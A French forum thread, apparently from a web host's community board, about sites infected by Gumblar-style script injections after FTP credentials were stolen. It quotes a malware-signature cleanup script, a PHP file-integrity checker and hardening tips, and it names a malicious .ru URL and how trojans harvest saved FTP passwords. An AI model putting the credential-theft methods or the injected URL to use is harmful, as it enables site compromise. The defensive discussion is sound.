MAIS MAIS ce n'est pas le seul scénario, loin de là! Les attaques qui m'avaient atteintes utilisaient des failles de Joomla ou de EZ-Publish pour insérer des fichiers / scripts qui ensuite permettaient aux méchants de s'introduire sur la machine.
J'avais alors adapté mes scripts php pour vérifier si dans les arguments de l'url figure "http://" alors que mes programmes, eux, ne le font pas: si cette chaîne est là, c'est sans doute (attention, ce peut être différent sur vos sites) que mon site est "sondé" par des robots ou zombies. On peut alors décider de la conduite à tenir, la plus soft étant un redirect 301 ou un simple erreur 404 qui persuadera "ce" zombie, voire par la suite le botnet / la "horde" dont il fait partie, d'aller chercher ailleurs meilleure fortune...

Et deux mesures simples:
- un cron qui nettoie les fichers de cache (j'avais un problème où suite à l'utilisation de pages de pubs, les caches grossissaient, ce qui me posait problème...)
- utilisation d'un accès ssh (putty, tunnelier) pour changer tous les fichiers ou tous les répertoires
chmod -Rc g-w,o-w * (si l'on est à la racine linux) ou plus couramment
chmod -Rc g-w,o-w .*lève le droit d'écriture (w) aux groupes et "au monde", sans toucher aux autres modes. Par exemple 777 deviendrait 755 et 666 deviendrait 644

Si vous n'avez pas une sauvegarde unique sur un PC... il faudrait peutêtre utiliser SVN... mais cela risque de poser d'autres problèmes de sécurité...

Si vous avez de l'espac disque, vous pouvez en putty / Tunnelier copier l'ensemble de votre site (dans le répertoire /www/xxx) dans un autre répertoire, par exemple /BAK/xxx Si onle fait en shell, c'est TRES rapide.....

@lodemars : Malheureusement, il n'y a pas de réponse générale, cela dépend du trojan. Une méthode consiste à intercepter, à un stade ou un autre, les codes FTP quand une connexion FTP s'établit... mais il y a plus simple : sur les logiciels FTP, si les mots de passe sont stockés (et on le fait TOUS, tôt ou tard, parce que, un jour ou l'autre, on craque de devoir les retaper), il suffit au trojan d'aller les chercher là. (Même moi, je ne retape pas TOUS les mots de passe, seulement les plus critiques.)

Mais comment?! Les mots de passe ne sont-il pas cryptés?! Souvent mais pas toujours, et quand ils le sont, c'est souvent avec des codages très faibles... qui ne servent à rien sur les logiciels open source puisque, par défintion, on peut connaître le code que le logiciel emploie pour décrypter le mot de passe. En effet, les mots de passe FTP sont transmis en clair et doivent donc obligatoirement être décryptés par le client FTP s'il les a stockés sous un forme codée. Ce qui signifie aussi que, pour les clients FTP non-open-source, il suffit d'un peu d'inverse-engineering pour décoder les mots de passe facilement.

Je comprends un peu mieux.
J'ai deux hébergement, l'un chez 1&1 avec un seul site, et l'autre chez OVH (90 plan) en multi site. Tout les index et fichiers jsquery (pour les lightbox) des ces deux hébergements ont été touchés.
Je peux donc en déduire que c'est bien une récupération de code FTP qui a eu lieu. Je viens de changer les mots de passe FTP et désormais je les taperai moi même dans Filezila. Mais si j'ai bien compris, ça peut ne pas être suffisant si le trojan les détecte au moment de la connection...?

Edit : Après lecture des différents sujets (merci CHBJ et Enycu pour les tutos), j'ai quelques réponses. Donc c'est effectivement lors de la connection via filezilla (j'ai moi même entré mon mdp)que le trojan pourrait récupérer les identifiants de connection.
Je crois comprendre aussi qu'il faut mieux transférer ses fichiers via SSh (permit en mutualisé chez ovh) qu'en FTP. Seul hic pour moi, ça ne marche pas chez les multi hébergements.
Rectifiez moi si je me gourre.

Seul hic pour moi, ça ne marche pas chez les multi hébergements.
Rectifiez moi si je me gourre.Si si ça marche. De deux façons:
- en gardant un seul ID ftp, par exemple si tu es le seul admin de l'ensemble des sites: tu vas te connecter à /www sur ovh, et de là tu peux aller dans le subdir que tu veux
Variante: avec filezilla ou autre, tu fais un compte par site, ils ont tous les mêmes infos sauf le répertoire cible qui est /www/site1 www/site2 etc.
- si chaque site a un admin et que tu ne veux pas qu'ils interfèrent: dans ton multi-hébergement, tu définis de nouveaux comptes FTP...

Pour info il existe un script qui désinfecte le virus qui se loge dans les index.php et .js

http://www.bleuken.com/utility/fixfiles.zip

Pour plus d'info : http://www.bleuken.com/2009/12/20/fixing-gnu-gpl-virusmalware/

Pour moi et d'autre personne ça a bien fonctionné.
Par contre dans mon cas (hébergé chez MavenHosting) j'ai du modifier la ligne 49 car j'avais cette erreur : Warning: fread() [function.fread]: Length parameter must be greater than 0 in fixfiles.php

Suffit de rajouter un "@" à cette endroie --> $theData = @fread($fh, $fsize);

Par contre chez Free.fr ça ne fonctionne pas :
Fatal error: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0
C'est encore une erreur 49 mais là j'ai pas trouvé comme contourné cette erreur, d'ailleur si y en a un qu'a la soluce, ça serait le bienvenue ;)

Pour info il existe un script qui désinfecte le virus qui se loge dans les index.php et .js
http://www.bleuken.com/utility/fixfiles.zip
Pour plus d'info : http://www.bleuken.com/2009/12/20/fixing-gnu-gpl-virusmalware/

Pour moi et d'autre personne ça a bien fonctionné.
Par contre dans mon cas (hébergé chez MavenHosting) j'ai du modifier la ligne 49 car j'avais cette erreur : Warning: fread() [function.fread]: Length parameter must be greater than 0 in fixfiles.php
[...]
C'est encore une erreur 49 mais là j'ai pas trouvé comme contourné cette erreur, d'ailleur si y en a un qu'a la soluce, ça serait le bienvenue ;)

Ta correction pourrait être ligne 47: if ($fsize>0)
L'erreur proviendrait de fichiers (déjà) vides , peut-être aussi d'autres objets du système de fichiers (liens?).

Mais, ce script me semble très dangereux:

la signature utilisée n'est pas complète;
le script coupe le fichier avant cette signature
(si cette signature est en début de fichier, il vide simplement le fichier:
fichier vide => plus de problème :) );
pour la signature 1, il n'y a pas de backup;
le backup .bak est accessible, et peut être lu depuis l'extérieur (sans interprétation PHP).



$findvir1 = "<script>/*GNU GPL*/ try{window.onload = function()";
$findvir2 = "/*GNU GPL*/ try{window.onload = function()";

...
$fullfile = "$path/$file";
$fullback = "$path/$file" . ".bak";
$fsize = filesize($fullfile);
if ($fsize!=0) { // *** CORRECTION POUR CEUX QUI AIMENT L'AVENTURE ***
$fh = fopen($fullfile, 'r');
$theData = fread($fh, $fsize);
fclose($fh);
$pos = strpos($theData, $findvir2);
if($pos > 0) {
$cleanData = substr($theData, 0, $pos); // *** BOOM! ***
echo "Infected file: $fullfile @ $pos <br>\n";
//echo "$cleanData";;
echo "Copying to a back-up file: $fullback";
$fh = fopen($fullback, 'w');
fwrite($fh, $theData);
fclose($fh);
echo "Overwriting original file: $fullfile with a clean file.";
$fh = fopen($fullfile, 'w');
fwrite($fh, $cleanData);
fclose($fh);
}

$pos = strpos($theData, $findvir1);
if($pos > 0) {
$cleanData = substr($theData, 0, $pos);
echo "Infected file: $fullfile @ $pos <br>\n";
//echo "$cleanData";;
echo "Copying to a back-up file: $fullback <br>";
$fh = fopen($fullback, 'w');
//I disable the back-up process. Remove // below to enable it.
//fwrite($fh, $theData);[/B][/U] // *** REBOOM ET SANS BOUÉE CETTE FOIS ***
fclose($fh);
echo "Overwriting original file: $fullfile with a clean file.<br/>";
$fh = fopen($fullfile, 'w');
fwrite($fh, $cleanData);
fclose($fh);
}
}
}

Merci à toi Sébastien, je vais testé ça ce soir :)

Sinon concernant le script : sur mon serveur, il a du me dévéroler facilement plus de 100 fichiers en moins de 5mn, j'ai eu aucune perte et à chaque fois qu'il a vu un virus dans un de mes fichiers, il a fait un backup avant de le désinfecter.

Pour ce virus, je pense que ça posera aucun pb, par contre pour les nouveaux à venir, comme tu dis si la signature est en début de fichier, ça va pas le faire du tout.
Faudrait modifier le script de façon à ce qu'il ne supprime que la ligne vérolée.

Par contre ce que je pige pas, c'est que tu dis qu'il ne fait pas de backup de la signature 1, pk y en a plusieurs ?

Quant aux .bak, je pense pas que les gens vont les laisser sur leur site, on les virent une fois qu'on est sur que tout refonctionne.

D'ailleurs un truc qui serait super, c'est un petit script qui supprimer tous les .bak dans tous les répertoires, ça ferait gagner pas mal de temps ;)

En tout cas je pense que ça peu être une bonne base pour ce débarrasser facilement de ses merdes en plus c'est gratos et on peut le faire évoluer.

Merci à toi Sébastien, je vais testé ça ce soir :)

Sinon concernant le script : sur mon serveur, il a du me dévéroler facilement plus de 100 fichiers en moins de 5mn, j'ai eu aucune perte et à chaque fois qu'il a vu un virus dans un de mes fichiers, il a fait un backup avant de le désinfecter.

Et il ne te reste aucun fichier de taille 0 ?

Pour ce virus, je pense que ça posera aucun pb, par contre pour les nouveaux à venir, comme tu dis si la signature est en début de fichier, ça va pas le faire du tout.
Faudrait modifier le script de façon à ce qu'il ne supprime que la ligne vérolée.

Par contre ce que je pige pas, c'est que tu dis qu'il ne fait pas de backup de la signature 1, pk y en a plusieurs ?
J'appelle signature ces deux variables (la différence vient du <script> au début).

$findvir1 = "<script>/*GNU GPL*/ try{window.onload = function()";
$findvir2 = "/*GNU GPL*/ try{window.onload = function()";
Il y a deux fois le même traitement (ou presque) pour chacune de ces signatures.
Première fois entre la ligne 52 et 64 de "if ($pos > 0) {" à "}",
et deuxième fois entre la ligne 67 et 80 (de "if ($pos > 0) {" à "}").

Sauf que pour le deuxième traitement, ligne 74, l'auteur a volontairement désactivé (commenté) la sauvegarde du backup.

//I disable the back-up process. Remove // below to enable it.
//fwrite($fh, $theData);
Il faut enlever les // ligne 74, pour remettre la fonction de backup.
fwrite($fh, $theData);

Oui, bon, mais enfin, comme le dit justement Sébastien, le script est assez dangereux d'une part, et, de toutes manières: OUI, il y a une "infinité" de signatures (code nuisible) possibles, et de très très nombreux codes différents existent déjà. Je mentionnais déjà différentes techniques en créant ce fil. (Simple iframe, javascript.)

The program reads all the files on your website and check for any existence of a certain signature of the virus or malware. It then removes the malicious code and rewrite the file without the virus.

En d'autres mots, et à supposer qu'il fonctionne parfaitement, il est limité aux signatures que l'auteur connaissait. Donc ce n'est pas une sécurité très élevée. Hélas. :(

Et il ne te reste aucun fichier de taille 0 ?

Si c'est les index.php.bak ils sont tous à 0 donc il a pas backupé mes index.php avant de les dévéroler, j'ai eux du cul qu'il le fasse bien.

Par contre pour les fichier .js ça les a bien backupé en .js.bak avant de les déviruser.

Tu pense qu'en supprimant les // de la ligne 74, ça rectifierait le pb de sauvegarde ?

Sinon concernant les futurs évolutions de ses virus, on pourrait pas rajouter une tite page ou y aurait plus qu'a entrer le code du virus, pour qu'il le supprime de tous les fichiers ?

Une solution intéressante pour superviser et éventuellement corriger un site est d'utiliser un outil de gestion de version comme CVS ou SVN.

Le site sain va dans un répertoire /svn-repository/site-sain;
Le répertoire /www héberge une version de travail (attention à interdire l'accès aux répertoires .svn / .cvs avec un fichier .htaccess);

Si la version de travail est modifiée autrement que manuellement, c'est une intrusion (ou un bug sur le filer)...

Suivant les cas, on peut imaginer une autre version de travail avec un sous-domaine pour les mises à jour depuis un navigateur.


http://www.linuxjournal.com/article/5569

Conclusion
Finding changes in the filesystem can be an effective method for detecting intruders. In this article we have illustrated some simple Perl code that bends CVS into a homegrown, host-based intrusion-detection system.

At my current place of employment, USinternetworking, Inc., a large ASP in Annapolis, Maryland, we use a similar (although greatly expanded) custom system called USiOasis to help verify filesystem integrity across several hundred machines in our network infrastructure.

The machines are loaded with various operating systems that include Linux, HPUX, Solaris and Windows, and run many different types of server applications. The system includes a MySQL database back end, a rather large CVS repository and a custom web/CGI front end written mostly in Perl.

Making use of a CVS repository to perform difference tracking also comes with an important additional benefit: an excellent visualization tool written in Python called ViewCVS. Storing operating system and application configuration files within CVS also aids several areas outside of detecting intrusions, such as troubleshooting network and application-level outages, disaster recovery and tracking system configurations over time.

Michael Rash works as a senior security engineer for an ASP in Annapolis, Maryland. He holds a Master's degree in Applied Mathematics from the University of Maryland and has been tinkering with Linux since 1998. In his free time he enjoys playing the violin for the Prince George's Philharmonic Orchestra.
Ça tombe bien OVH propose SVN... http://guides.ovh.com/SVNMutu ;)

Note: je n'utilise pas, je partage juste l'idée; d'ailleurs, je n'ai pas lu l'article complètement.

@maxmiz: oui, si tu enlèves les commentaires de la ligne 74, ça corrigera les problèmes d'index.php.bak de taille nulle. Mais pas le reste! :D
En plus, l'auteur du script a publié une nouvelle version de son script!
//I disable the back-up process. Remove // below to enable it.
//fwrite($fh, $theData);

Bonjour à tous,

Je me présente Nicolas Lesaffre et je suis nouveau sur ce forum. Je ne suis pas du tout un expert mais je voulais juste répondre à ce post car j'ai été victime aussi de gumblar et l'ensemble de mes 12 sites ont été infectés.

Un américain a trouvé la parade a trouvé la solution. c'est un script installable sur vos serveurs. Vous le lancez, il cherche, supprime et restaure tout les fichiers infectés.

Possibilité de faire un cronjob pour l'automatiser. Je veux pas polluer en pub, donc si vous êtes intéressé contactez-moi par MP ou par email (c'est mieux).

Ce produit coûte 37$, +/-27€.

Mises à jour à vie, possibilité d'avoir l'aide des codeurs du type, licence multi-sites.

Voilà, le but n'est pas de faire de pub mais juste de donner une solution concrète à un maximum de personnes.

Merci.

Nicolas

PS : Bonjour à Arlacais ;-)

On en a déjà parlé. Il y a du pour et du contre pour la méthode. Comme tout logiciel malveillant qui prend différentes formes, le logiciel chargé de l'éradiquer doit tout le temps être mis à jour.
Le mieux c'est la prévention. On en parle dans les pages précédentes (notamment à cause de Filezilla qui stocke ses mots de passe en clair)

bonjour enycu,

oui, c'est aussi une question de bon sens, je crois. Maintenant, je n'enregistre plus rien sur mon PC. J'ai changé de client ftp et je gère mes p/w quasi manuellement et je les génère 1 par 1.
Avant j'avais un mot de passe global...... super nul, non ?

Faut se faire avoir pour savoir comment réagir....

Bonjour,

Mais si, Nico, tu es expert ... dans l'art de me devancer.
Et dans d'autres domaines aussi.

Juste pour confirmer ce que j'avais déjà écrit sur ce forum,
il est impératif que le PC qui se connecte à votre site par ftp
soit protégé, par exemple par Kasperky ( pub gratuite ) mais
cet anti-virus m'a déjà alerté plusieurs fois sur Gumblar.
Il a même effacé de simples mails qui en parlaient
Et même si c'est pénible de taper son mot de passe FTP à
chaque connexion, je le répètes, il ne faut PAS l'enregistrer.

En résumé 3 semaines de galère il y a quelques mois, mais j'ai
beaucoup appris.

Quand même une satisfaction, mon site est premier sur google
avec les termes "eliminer Gumblar" ;)

Christian

Salut

J'ai eu une infection sur un de mes sites par une injection de scritp JS ce qui a eu pour effet que le site a été détecté comme dangereux par certains antivirus (bizarrement pas par google...)

Je viens de constater en barre d'état l'affichage de l'adresse suivante :
http://washingtonpost-com.way2sms.com.ynet-com.newworldline.ru:8080...etc...

J'ai pu nettoyer les scripts et sécuriser les codes mais je rencontre toujours des problemes. Est ce que ca ne vient pas de chez OVH ???

Comment éradiquer complètement le probleme ou comment faire un scan ou un diagnostic de sécurité sur un site ou un hébergement ?

Merci

Il n'y a pas de produits miracles, uniquement des vieilles recettes selon les cas : Éplucher les logs de connexion, changer les mots de passe, fiabiliser les scripts au niveau des entrées, appliquer immédiatement les mises à jour dans le cas de CMS, vérifier ou réinstaller les PC locaux, etc.
Il n'y a pas eu de cas relevant d'OVH à ma connaissance.

Petite mise à jour, non pas directement sur les iframes et les injections de scripts, mais au sujet d'Adobe encore, car cela peut concerner la sécutité des sites webs via la prise de contrôle d'ordinateurs.

Les logiciels visés sont :

* Flash Player 10.0.45.2 et précédentes sur Windows, Macintosh, Linux et Solaris
* Toutes les versions 9.X d’Acrobat et Reader sur Windows, Macintosh er UNIX

"Adobe Flash Player 10.0.45.2, 9.0.262, and earlier 10.0.x and 9.0.x versions for Windows, Macintosh, Linux and Solaris
Adobe Reader and Acrobat 9.3.2 and earlier 9.x versions for Windows, Macintosh and UNIX"

Bulletin de sécurité Adobe :
Security Advisory for Flash Player, Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa10-01.html

Aucun correctif n'est disponible à l'heure actuelle. Il devrait apparaître sous peu.


Un article en français qui devrait être mis à jour progressivement et qui contient des suggestions pour éviter autant que possible les problèmes (je n'ai pas testé) :
http://www.pcinpact.com/actu/news/57461-adobe-flash-acrobat-reader-faille-solution.htm

Bonjour,

On vient d'être hacké de cette façon: nos index.php et index.htm ont tous été modifiés, un bout de code a été ajouté!

Je suis sûr et certain qu'effectivement le hacker ait réussi à récupérer nos mots de passe FTP pour pouvoir naviguer librement sur FTP comme cela.
Le soucis c'est que notre pare-feu et antivirus n'ont rien détecté, comment ça se fait? J'ai scanné mon disque dur mais rien, aucun trojan ni spyware trouvé!

Connaissez-vous un outil que je peux tester pour détecter Gumblar ou Martuz?

Merci d'avance!

Lucas

Regarde tes logs FTP pour voir quand ces fichiers ont été modifiés.

Regarde tes logs FTP pour voir quand ces fichiers ont été modifiés.

... et après avoir trouvé ces logs .... C’est le silence...
Je n'ai encore jamais vu poster des logs FTP avec des IP's venant des connections "suspectes".
Donc l'accès FTP n'a pas été utilisé. Le "PC" va bien - le problème est comme d'hab: injection du code, rendu possible avec un script pas très 'étanche' présent sur l’hébergement.

Comment éradiquer complètement le probleme ou comment faire un scan ou un diagnostic de sécurité sur un site ou un hébergement ?

[Un bon CMS possède cette option (sauf ceux qui pensent qu’ils sont parfait ;)).
L'idée est que pour chaque fichier un code md5 sera enregistré.
Ceci pour tous les fichiers et toute la structure.

Sur ta demande, chaque fichier de ton CMS est vérifié avec la liste de MD5 - éventuel même avec la date de création - date de la modification.

Tout fichier qui n'est passe pas le test est donc modifié après la mise en place du site.

Reste à inspecter: les répertoires ou les utilisateur peuvent envoyer des fichiers (avatars, pdf, zip, exe, script, js, image etc etc) - il est clair que le procédure d'upload doit être écrit pour qu'il détecte ce que c'est comme fichier.
Permettre d'envoyer un script php ou js dans la peau d'un .img ou .jpg et c'est la mort du site assuré. .

... et après avoir trouvé ces logs .... C’est le silence...
Je n'ai encore jamais vu poster des logs FTP avec des IP's venant des connections "suspectes".
Donc l'accès FTP n'a pas été utilisé. Le "PC" va bien - le problème est comme d'hab: injection du code, rendu possible avec un script pas très 'étanche' présent sur l’hébergement.

Pour notre cas, ce n'est pas une injection de code car il y a des sites statiques et des sites dynamiques infectées.
En fait, est-ce vraiment possible que c'est par faille du Flash Player, on regarde beaucoup youtube???

Bonjour,

Un bon CMS possède cette option

Le dev de cette option (identifier les fichiers modifié) pour un CMS est absurde, les personnes qui développement des exploits et des bots pour automatiser le tout feront les mises à jour pour contrer l'option si on a le code source du dit cms, c'est pas très compliqué, un coup de canif dans le fichier PHP responsable du scan et il est hs.

C'est comme pour les nombreuses extensions anti flood qu'on peut trouver sur le site de wordpress, la plupart de ses extensions ont été étudier par les flooder et des solutions de contournement ont été mis en place, je pense notamment a l'extension http://wordpress.org/extend/plugins/block-spam-by-math-reloaded/ c'est la seule que j'ai testé (il y a quelques mois) pour "protéger" un blog massivement floodé, la solution était strictement inefficace, le bot répondait correctement.. J'ai fini par faire ma propre solution (au passage vue le change log, l'extension doit encore être inefficace)

Ce qu'il faut c'est déjà commencer par respecter les règles de base niveau CHMOD.

Ensuite pour vérifier la date de création/modification, c'est inutile comme dit plus haut (si mes souvenirs sont bon) cf http://fr2.php.net/%20touch , second paramètre, et depuis php 5.3 ça fonctionne aussi sous windows :D

Pour ce qui est de protéger les répertoires d'upload, via un htaccess on peut utiliser ceci :

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

Pour ce qui est de l'up du JS, c'est pas vérifiable par contre :/ (sauf si l'up concerne uniquement des images)

Sinon, suite à mon tout premier message, j'avais commencé à faire quelques tests, et je suis arrivé à une solution qui me convient et qui ma permit de retracé le cheminement du hack d'un des sites qui m'ont été confié. Par contre je préviens ! Ce n'est pas la solution miracle anti hack, j'ai juste fait ce script pour être capable de fournir un listing précis des fichiers récemment modifié, la solution ne protège rien directement mais peut vous alerter rapidement en cas de piratage.

Elle conserve la signature de tous les fichiers d'un dossier (et de ces sous dossier..) et est capable de dire quels fichiers ont été ajouté ou modifié depuis le dernier "scan".

Évolutions possibles : en cas de détection de fichier modifier, restaurer le bon fichier, fermer temporairement le site.. de façon automatique, envoyer un SMS a l'admin...

Voilà la bête :

<?php

/**
* Vérifier l'intégrité des fichiers
**/

//@config

//Liste des répertoires à scanner

$dir[] = '/homez.xxx/ndd/www/';
$dir[] = '/homez.xxx/ndd/sub/';

$database = 'file.db';
$white_list = array('jpeg','jpg','png','tiff','gif', 'txt', 'log', 'sqlite');
$destinataire = '[email]@gmail.com';
$expediteur = 'expediteur@gmail.com';

//@main

$start = time();
$db = array();
$result = array();
$new_db = array();


function catch_md5($dir)
{
global $db, $result, $white_list, $new_db;

if (is_dir($dir))
{
$files = scandir($dir);

foreach($files as $file)
{
if ($file != '.' && $file != '..')
{
if (is_dir($dir.'/'.$file))
{
// -R
catch_md5($dir.'/'.$file);
}
else
{
//L'extension est dans la liste blanche ?
if (in_array(strtolower(substr($file,strrpos($file, '.')+1)), $white_list))
continue;

$location = $dir.'/'.$file;
$md_file = md5_file($dir.'/'.$file); //Signature du fichier
$md_name = substr(md5($dir.'/'.$file),0,12); //Signature du nom du fichier

if (array_search($md_file,$db) === false)
{
if ( array_search($md_name,$db) === false )
$str = '[New] : ';
else
$str = '[Update] : ';

$stats = stat($location);
$result[] = $str.' ('.$stats['uid'].':'.$stats['gid'].') '
.'- '.date('r',$stats['ctime'])
.'- '.date('r',$stats['mtime']).' '.$location;
}

$new_db[] = $md_file;
$new_db[] = $md_name;
}
}
}
}
}

if (!file_exists($database))
if (file_put_contents($database,'') === false)
die('[fail] '.$database.' MUST be writable !');

$db = file($database, FILE_IGNORE_NEW_LINES);

array_walk($dir, 'catch_md5');

file_put_contents($database, implode("\n",$new_db));


/**
* Stats & Contre mesure
**/

$execTime = round((time()-$start)/60,2);
$objet = '[BOT] Integrity checker ('.count($result).')';

$headers = 'MIME-Version: 1.0' . "\n";
$headers .= 'From: "'.$expediteur.'"<'.$expediteur.'>'."\n";
$headers .= 'Delivered-to: '.$destinataire."\n";

if (count($result) != 0 || date('H') == 16)
mail($destinataire,$objet," Execution Time : ".$execTime." min\n".print_r($result, true));

J'ai peut être réinventé la roue quand j'ai fait ce script.. je devais avoir que ça a faire xD

Actuellement le script tourne en cron chaque heure, 30 secondes pour 3700 fichiers et m'envoie au moins un email par jour (vers 16h) j'ai fait cette dernière option pour être sur que le script tourne toujours. Le script est bien sur placé dans un dossier un peu enterré dans le dédié et le nom de la base n'est pas "file.db".

En fait, est-ce vraiment possible que c'est par faille du Flash Player, on regarde beaucoup youtube???
Une faille dans flash peut être la source des problèmes + les password stocké en clair chez fillezilla et boom xD par contre je doute fort que Youtube soit la source du malware.

Salut tous !

Un bon CMS possède cette option

Le dev de cette option (identifier les fichiers modifié) pour un CMS est absurde, les personnes qui développement des exploits et des bots pour automatiser le tout feront les mises à jour pour contrer l'option si on a le code source du dit cms, c'est pas très compliqué, un coup de canif dans le fichier PHP responsable du scan et il est hs.

.....

Voilà la bête :
......


Ta bête - compare le avec la fonction de vérification des fichiers de base du CMS que j'ai (indirectement) cité: e107
C'est absurde, le ressemblance ;)

Inclus la date de dernière modification d'un fichier - et la date de création de ce même fichier à protéger (ces deux là: dur dur à trafiquer- il faut être 'root' sur la machine, et dans ce cas on ne cherche plus à protéger le CMS, le serveur (OS) lui même sera considéré comme contaminé).

De toute façon, protéger son serveur sur le net avec une solution qui résistera à toute tentative n'existera jamais. Ce qui nous protège est de savoir comment le type procède pour gagner le contrôle de notre serveur. De détecter ces tentatives.

Je suis toujours à la recherche de comment le hacker a fait pour obtenir nos mots de passe. Même si l'on stocke les mots de passe dans FileZilla, il y a tout de même un Kaspersky Firewall sur les machines.

C'est pour cela que je doute d'un exploit sur du Flash Player non mis à jour mais si c'est le cas pourquoi le hack se fait à une heure où aucune machine n'est allumée au bureau?

J'analyse notre log FTP et je vois des accès répétés depuis quelques matins, et oui le virus ou la personne utilise bien notre login.

ON A MIS A JOUR TOUS NOS ANTIVIRUS, ON A SCANNE TOUTES NOS MACHINES MAIS AUCUN TROJAN TROUVE. L'infection des sites est comme suit: il scrute tous les index.php/.htm du FTP utilisé et injecte une <img> vers un nom de domaine bizarre (qui ne semble pas exister) à la fin, lorsqu'on accède au site après, on arrive à une page d'erreur car il y a erreur DOM (un code après </html>)

Salut

J'étais pas au courant pour e107, merci pour l'info. après c'est sur, rien n'est parfait, mais avec le code que j'ai posté, si la modif viens de la création d'une backdoor php sur le serveur, en croisant les logs d'accès à cette backdoor (avec l'ip, l'UA avec de la chance..) on peu savoir les premières urls visité par l'utilisateur de la backdoor, et remonté au script qui a permit la premiére injection de code, avec de la chance encore.. c'est sur.

@Lucas Panny
c'est simple, change le mot de passe, garde le pour toi et que pour un seul pc, check les logs, et si une connexions a lieu avec le nouveau pass.. formate ton pc xd c'est con, mais c'est la seule et unique solution qui te permettra d'être sur a 100% d'avoir supprimé un éventuel virus. Après un virus sur le pc n'est pas la seule possibilité, coté réseau y a aussi moyen d'intercepter des données, le pare feu du pc est inefficace dans ce cas.

... Après un virus sur le pc n'est pas la seule possibilité, coté réseau y a aussi moyen d'intercepter des données, le pare feu du pc est inefficace dans ce cas.

Dans le Manager, on peut changer l'accès le mot de passe FTP.
On peut aussi bloquer l'accès FTP la-bas !!

Il faut savoir que l'accès du Manager passe par le SSL ... que l'accès au Manager est signalé par mail - qu'il faut balancer l'ordi par la fenêtre si le mot de passe Manager tombe dans les mauvaise mains.

Si vous avez une site/occupation "pro" (et vous avez donc un Mutu Pro), passe par l'accès SFTP - du coup le reniflage sur le réseau sera aussi exclus.

Balance FileZilla, qui permet la collecte des adresses et mot de passes bien trop facile. Passe au FTP plus performant.

Conseil pour le PC et le parafue:
Il est totalement inutile de penser qu'un parafeu vous permet de vous protéger contre le mal venant du net. Vous êtes probablement derrière un routeur qui NAT vos connections, vous êtes donc déjà protégé.
Un parafue doit aussi vous renseigner quel code dans votre ordinateur essaie de connecter avec QUI (sur le net, ou autre PC's dans votre LAN).

Balance FileZilla, qui permet la collecte des adresses et mot de passes bien trop facile. Passe au FTP plus performant.
Ca c'est sûr, on l'a déjà abandonné. On utilise actuellement CuteFTP et après l'attaque qu'on a subi, on a décidé de ne plus enregistrer nos mots de passe dedans.

Côté éradication: on a déjà changé les mots de passe, formatté les machines.
Ce qui me tracasse en tant qu'administrateur c'est comment le hacker ou le trojan ait pu s'inflitrer et récupérer nos mots de passe. On a regardé le log et l'IP de l'attaquant se situe en Russie!!!???

Ca c'est sûr, on l'a déjà abandonné. On utilise actuellement CuteFTP et après l'attaque qu'on a subi, on a décidé de ne plus enregistrer nos mots de passe dedans.
Attention quand même.

Un Trojan peur scrutiner les fiochisr de config (et registry) de pas mal de logiciel connu pour les codes d'accès.

D’oubli jamais la façon le plus simple: n'importe quel logiciel peut ce 'hooker' dans la gestionnaire de clavier pour capter et transmettre tout saisi.
Après il fltre - et si il découvre une chaine de 16 chiffres qui repond bien au codage d'un Visa ou Mastercard, il faut le capture total de tous ce qui suit.
Comme ça ils auront aussi la date de validation et le code de sécurité.

A comprendre: un Trojan s'invite pas - c'est l’utilisateur qui l'installe - très souvent avec cet autre logiciel 'pas cher' (disons direct: gratos car sinon trop cher).

On a regardé le log et l'IP de l'attaquant se situe en Russie!!!???
On est vendredi, donc je te dit la vérité:
Russie, oui, car c'est la-bas ou je loue mon proxie pour mes aventures 'obscures'. C'est donc bien un type en France, ton voisin peut être.
Mon autre proxie est au Maroc bien sur ;)

Un poil plus sérieux: l'IP, ça ne donne AUCUNE information sur l'identité de ton hackeur.

C'est vrai un hacker se cache souvent derrière des proxys, une cascade de proxys même mais ça ralentirait son accès non?

ralentirait ?

Avec un RTC (56kbits) et un accès shell ou quelques injections par URL suffit amplement.
Un des règles de base d'un hacker: passer inaperçu - et en douceur.
Le 'hack' d'un serveur ce démontre dans la finesse de l'opération, ceci contraire à un attaque DDOS, ou l’attaque est brut et en masse.

Salut tout le monde, bon je viens ici par ce que je commence à désespérer... Voila ma situation, je vais essayer d'être bref. Je tiens à préciser que j'ai déjà contacter l'équipe technique d'OVH qui m'a redirigé sur ce topic.

Je pense avoir été victime d'une injection javascript (par intégration iframe). Je dis bien je pense car je ne comprends pas du tout ce qui m'arrive ces derniers jours. J'ai suivi la "résolution du problème" n°2 telle que présentée en première page mais sans grande conviction puisque les fichiers de mon site se trouvant sur le FTP n'ont pas été modifiés. J'ai réinstaller TOUT le site par des fichiers propres et vérifiés, aucune trace de ce satané iframe... Ceci-dit, avant le backup, en vérifiant mes fichiers, il n'y avait aucune trace de ce code non plus... :confused: Bref, ce code en question est le script de Google Analytics, quand on l'analyse (clic droit > code source du cadre), on y voit des identifiants du fameux programme d'analyse Google, en voici la ligne :
_gaq.push(['_setAccount', 'UA-xxxxxxxxx']);

La problématique qui se pose est la suivante : d'où vient ce maudit code ?! Je n'ai souscris à aucun programme Google et je me pose la question suivante : a qui appartient cet identifiant ?? C'est à n'y rien comprendre puisqu'il me semble que pour avoir accès à ce programme, google vous demande de placer un fichier sur votre serveur FTP pour vérifier que vous êtes bien le propriétaire du site, hors aucune trace d'intrusions, aucune trace de ce fameux bout de code Google Analytics sur mes pages !

Google analytics se mettrait-il a diffuser son programme sur des sites au hasard ?! Oui je spécule, car je suis à cours d'explications possibles pour ce qui est en train de m'arriver...
Si quelqu'un à une solution à mon problème, je lui en serais vraiment reconnaissant, de plus ce problème retarde l'ouverture officielle du site et j'ai quelques délais à respecter.

Merci d'avance !
--------------------------
EDIT : Le problème venait d'un malware. Possédant Kaspersky, je pensais qu'il se chargeait de détecter et de supprimer ces saloperies, et bien non... le nom du logiciel qui m'a éviter l'asile psychiatrique > MalwareBytes AntiMalware pour ceux que ça pourrait intéresser ou qui ne connaissaient pas.